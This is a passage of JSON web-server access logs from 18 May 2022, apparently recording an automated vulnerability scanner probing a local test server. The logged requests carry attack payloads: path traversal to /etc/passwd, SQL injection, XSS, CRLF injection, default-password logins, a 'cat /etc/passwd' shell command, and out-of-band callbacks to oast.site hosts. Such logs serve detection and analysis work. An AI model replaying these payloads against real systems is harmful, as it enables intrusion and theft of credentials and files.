HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29K9NJqeiidoh0rwvxCZ2wCglMT/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/supportInstaller HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"MSIE", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"ca281d8smpvb9r2g07h053sb7y455wm18.oast.site","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crossdomain.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://ca281d8smpvb9r2g07h0ah1zfojag3uq6.oast.site\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"@ca281d8smpvb9r2g07h01qsxt9b3aie5x.oast.site","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.044","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 